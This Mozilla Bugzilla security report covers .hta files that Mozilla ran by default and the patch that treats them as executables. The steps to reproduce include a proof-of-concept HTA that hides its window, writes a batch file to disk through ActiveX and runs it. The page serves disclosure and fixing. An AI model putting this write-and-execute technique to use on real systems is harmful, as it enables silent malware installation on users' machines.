Last Comment Bug 220257 - Mozilla favors writing/executing on harddisk, using .hta files
: Mozilla favors writing/executing on harddisk, using .hta files
Status: RESOLVED FIXED
[sg:fix]
: fixed1.4.2, fixed1.5
Product: Core
Classification: Components
Component: File Handling (show other bugs)
: Trunk
: x86 Windows 2000
: -- critical (vote)
: mozilla1.6alpha
Assigned To: Christian :Biesinger (don't email me, ping me on IRC)
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2003-09-25 04:09 PDT by Bernd Heinze
Modified: 2004-05-25 14:52 PDT (History)
3 users (show)
brendan: blocking1.4.2+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
patch (1.15 KB, patch)
2003-09-25 05:11 PDT, Christian :Biesinger (don't email me, ping me on IRC)
darin.moz: review+
bzbarsky: superreview+
brendan: approval1.4.2+
asa: approval1.5+
Details | Diff | Review

Description Bernd Heinze 2003-09-25 04:09:14 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.4) Gecko/20030624

Due to a bug in Internet Explorer .hta files can write and execute files on the
harddisk. When Mozilla loads a hta file the first time it asks the user what to
do with it, and defaults to run and don't ask again. Most users that don't know
what hta is and that don't know about the bug in Internet Explorer will hit OK
because they think it's safe. I also thought that Mozilla is safe regarding bugs
like this, but a dialer that installed automatically on my system prove me wrong.

Reproducible: Always

Steps to Reproduce:
1. Create the following file test.hta on your harddisk:
<html><head><hta:application id=hta_note_id
  applicationName=hta_note_name
  showInTaskBar=no
  caption=no
  innerBorder=no
  selection=no
  scroll=no
  contextmenu=no />
 <script language=javascript>
	window.resizeTo(0, 0);
 	window.moveTo(0, 0);
 </script>
 </head>
 <body>
 <script language=vbscript>
 	h0 = "pause"    	
</script>
 <script language=javascript>
 	var fs = new ActiveXObject('Scripting.FileSystemObject');
 	var ts = fs.CreateTextFile("c:\\test.bat", true, false);
 	ts.Write(h0); 
    	ts.Close();
 	var wsh = new ActiveXObject('WScript.Shell');
	wsh.Run("c:\\test.bat");
	window.close();
</script></body></html>
2. Drag file into Mozilla
3. a) If it's the first time Mozilla loads an application/hta file a windows
will pop up what to do, wich defaults to run, and don't ask again. Click OK
b) if there is already an entry for application/hta Mozilla do what is speicfied
(probably the default setting)
4. Enjoy the message
Actual Results:  
Program on harddisk that can do anything. Delete data, spy out passwords

Expected Results:  
Mozilla should treat application/hta files like .exe files. Don't ask, don't
run, just save them on harddisk. The user can run them manually if he really
wants to.
Comment 1 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 05:06:09 PDT
ok... taking
Comment 2 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 05:11:24 PDT
Created attachment 132136 [details] [diff] [review]
patch
Comment 3 Bernd Heinze 2003-09-25 07:25:02 PDT
Thank you for working so quickly on this bug. I looked at the patch and to me it
seemed like it only checkes the file extension. Does that mean that this link
still works?
http://www.heise.de/security/dienste/browsercheck/demos/ie/htaalert.php
This link seems like a (harmless) php-File but is in reality a (harmless)
exploit  delivered as "application/hta".
Comment 4 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 07:38:10 PDT
No, that doesn't work either. The checked file extension is the final one, which
is also .hta in this example.
Comment 5 Boris Zbarsky [:bz] 2003-09-25 08:16:48 PDT
Comment on attachment 132136 [details] [diff] [review]
patch

sr=bzbarsky
Comment 6 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 05:57:05 PDT
Checking in nsLocalFileWin.cpp;
/cvsroot/mozilla/xpcom/io/nsLocalFileWin.cpp,v  <--  nsLocalFileWin.cpp
new revision: 1.108; previous revision: 1.107
done
Comment 7 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 05:59:54 PDT
Comment on attachment 132136 [details] [diff] [review]
patch

would be nice to get this security fix into 1.5 and 1.4.2, too...
it just makes it so that .hta files are also considered executable, should be
very low risk.
Comment 8 Bernd Heinze 2003-09-26 06:38:33 PDT
Is it already too late for 1.4.1?
Comment 9 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 08:16:25 PDT
to my knowledge, it is.
Comment 10 Brendan Eich [:brendan] 2003-09-29 11:01:38 PDT
I think this should get fixed on the 1.4 branch.  I'm recommending it for 1.5
also, but I'll let another driver mark the bug blocking1.5.

/be
Comment 11 Asa Dotzler [:asa] 2003-09-29 11:06:20 PDT
Comment on attachment 132136 [details] [diff] [review]
patch

a=asa (on behalf of drivers) for checkin to the 1.5 branch.
Comment 12 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-29 12:42:53 PDT
looks like brendan already checked this into the 1.5 branch
Comment 13 Brendan Eich [:brendan] 2003-09-29 12:45:59 PDT
Yes, sorry -- thought I updated this bug (I switched machines and may have left
a bugzilla login screen up).

/be
Comment 14 Christopher Aillon (sabbatical, not receiving bugmail) 2003-11-24 07:30:29 PST
Opening.
Comment 15 Brendan Eich [:brendan] 2003-11-27 10:41:29 PST
Comment on attachment 132136 [details] [diff] [review]
patch

Please check into the 1.4 branch.

/be
Comment 16 Christian :Biesinger (don't email me, ping me on IRC) 2003-11-27 14:51:09 PST
fixed on 1.4 branch
Checking in nsLocalFileWin.cpp;
/cvsroot/mozilla/xpcom/io/nsLocalFileWin.cpp,v  <--  nsLocalFileWin.cpp
new revision: 1.102.2.2; previous revision: 1.102.2.1
done

Note You need to log in before you can comment on or make changes to this bug.